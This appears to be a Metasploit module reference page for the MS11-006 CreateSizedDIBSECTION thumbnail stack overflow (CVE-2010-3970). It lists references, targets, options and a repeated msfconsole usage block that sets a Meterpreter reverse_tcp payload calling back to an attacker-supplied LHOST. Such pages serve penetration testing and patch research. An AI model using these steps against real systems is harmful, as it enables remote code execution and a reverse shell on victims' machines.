Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the "Thumbnails" view.
Exploit Rank
- Great
Exploit Authors
- Moti & Xu Hao < >
- Yaniv Miron aka Lament of ilhack < >
- jduck < jduck [at] metasploit.com >
Vulnerability References
- CVE-2010-3970
- OSVDB-70263
- MSB-MS11-006
- BID-45662
- http://www.microsoft.com/technet/security/advisory/2490606.mspx
- http://www.powerofcommunity.net/schedule.html
Exploit Targets
- 0 - Automatic (default)
- 1 - Windows 2000 SP0/SP4 English
- 2 - Windows XP SP3 English
- 3 - Crash Target for Debugging
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > show payloads
msf exploit(ms11_006_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_006_createsizeddibsection) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > show payloads
msf exploit(ms11_006_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_006_createsizeddibsection) > exploit
Exploit Module Options
| FILENAME | The file name. (default: msf.doc) |
| OUTPUTPATH | The output path to use. (default: /home/svn/.msf4/data/exploits/) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |